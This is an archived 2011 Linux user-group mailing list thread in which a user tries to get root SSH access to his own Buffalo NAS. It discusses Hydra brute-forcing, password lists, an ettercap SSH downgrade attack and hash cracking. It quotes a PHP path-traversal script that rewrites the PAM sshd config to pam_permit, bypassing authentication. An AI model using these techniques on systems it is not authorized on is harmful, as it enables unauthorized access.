Is it possible to extract the root password from the file system?

Mark Phillips mark at phillipsmarketing.biz
Sun Jul 17 09:44:09 MST 2011


Bryan,

I think what you are missing is the "...and you know your password...". I
don't know the root password for the NAS box. That is what I am trying to
figure out so I can ssh into the box as root. What I have:

* Buffalo NAS LS-WXL with firmware rev 1.43

* I can ssh as root and get a password prompt.

* I can ftp into the box as a user that I created, but cannot get to the
filesystem that way.

* I have downloaded the firmware and unzipped it. One thought is to add a
key to ssh for root and login. Reflashing the unit with firmware that does
not come from the Buffalo site is not well documented, so I have put this
possible solution on hold for the time being.

* I just found the info about using some type of php exploit, hence my
previous email. I am not a php guy, so I am a little lost on how to make it
work.

Does this elicit any thoughts on how to crack the root password for this
box?

Thanks!

Mark

On Sun, Jul 17, 2011 at 4:31 PM, Bryan O'Neal <
Bryan.ONeal at theonealandassociates.com> wrote:

> if you can get a copy of the password hash file. And you know your
> password. Then you should be able to figure out the hash function and
> JTR should give you every password on the box. So... I seem to be
> missing something in this conversation thread. ?
>
> On 7/17/11, Mark Phillips <mark at phillipsmarketing.biz> wrote:
> > On Sun, Jul 17, 2011 at 3:54 AM, Lisa Kachold
> > <lisakachold at obnosis.com>wrote:
> >
> >> There are alot of password files and dictionary lists on various sites.
> >> Backtrack5 contains a good number.
> >>
> >> But I imagine that it's either not allowing root via ssh or you have the
> >> wrong username.
> >>
> >
> > It turns out the box is smarter than a fifth grader.....after a few hydra
> > attacks, it started rejecting all the hydra attempts to ssh in via root.
> > Once I stopped hydra (after running all night), it took a couple of hours
> > before it would respond to ssh attempts from root. It now will ask for
> the
> > root password, but I still have no idea what it is.
> >
> >>
> >> Or it's a truely random string.
> >>
> > It could be....the password for the zip file to unzip the file system is
> >
> >  YvSInIQopeipx66t_DCdfEvfP47qeVPhNhAuSYmA4
> >
> > . Someone retrieved it using a disassembler on the file system.
> >
> > I did some more reading, and one person was able to use php to allow ssh
> > login. The box allows one to create a web space, and it comes with php
> > installed. One can edit the php.ini file, and I can upload via ftp a php
> > script. The script they suggested is:
> > <?php
> > $file = '../../../../etc/pam.d/sshd';
> > $fh=fopen($file, 'w') or die("can't open file");
> > $stringData = "account  required   pam_unix.so\n";
> > fwrite($fh, $stringData);
> > $stringData = "session  required   pam_unix.so\n";
> > fwrite($fh, $stringData);
> > $stringData = "auth required pam_permit.so\n";
> > fwrite($fh, $stringData);
> > fclose($fh);
> > ?>
> >
> > I uploaded the script, but I get a 404 File not Found when I access the
> > page. I thought it might be a file permission error since the file is
> only
> > rw. I tried chmod 777 at the ftp prompt, and got the error message File
> not
> > Found, but ls shows it is there.
> >
> > ftp> ls
> > 200 PORT command successful
> > 150 Opening ASCII mode data connection for file list
> > drwxrwxrwx   2 apache   apache          6 Jul 17 08:23 cgi-bin
> > drwxrwxrwx   2 apache   apache         22 Jul 17 08:23 htdocs
> > drwxrwxrwx   2 apache   apache         39 Jul 17 08:23 log
> > -rw-rw-rw-   1 hammerhead hdusers       335 Jul 17 08:49 script.php
> > 226 Transfer complete
> > ftp> chmod 777 script.php
> > 550 CHMOD 777 script.php: No such file or directory
> > ftp>
> >
> > Is there anything I can change in the php.ini file to make this script
> > execute? Or, am I missing something else?
> >
> > BTW, I cannot ftp as root, but I can ftp as a user I created, hammerhead.
> >
> > Thanks,
> >
> > Mark
> >
> >>
> >> On Fri, Jul 15, 2011 at 10:33 PM, Mark Phillips <
> >> mark at phillipsmarketing.biz> wrote:
> >>
> >>> Since this is a drive buffalo, I might try ettercap ssh downgrade
> attack:
> >>>>
> >>>> http://openmaniak.com/ettercap_filter.php
> >>>> ttp://
> sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade
> >>>>
> >>>> Not sure how a man in the middle attack will work, since I don't know
> >>>> the
> >>> password to begin with...
> >>>
> >>> Or Hydra:
> >>>>
> >>>> Hydra Instructions:
> >>>>
> >>>> http://www.youtube.com/watch?v=7CP-JB4QARo
> >>>>
> >>>>>
> >>>>>> Hydra is promising. I tried it with the common passwords list from
> >>> openwall. No luck. Do you have any better password lists?
> >>>
> >>> Thanks,
> >>>
> >>> Mark
> >>>
> >>> ---------------------------------------------------
> >>> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
> >>> To subscribe, unsubscribe, or to change your mail settings:
> >>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> >>>
> >>
> >>
> >>
> >> --
> >> (602) 791-8002  Android
> >> (623) 239-3392 Skype
> >> (623) 688-3392 Google Voice
> >> **
> >> HomeSmartInternational.com <http://www.homesmartinternational.com>
> >>
> >>
> >>
> >>
> >>
> >>
> >>
> >>
> >>
> >>
> >>
> >>
> >>
> >>
> >>
> >> ---------------------------------------------------
> >> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
> >> To subscribe, unsubscribe, or to change your mail settings:
> >> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> >>
> >
>
> --
> Sent from my mobile device
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.PLUG.phoenix.az.us/pipermail/plug-discuss/attachments/20110717/a6047823/attachment.html>


More information about the PLUG-discuss mailing list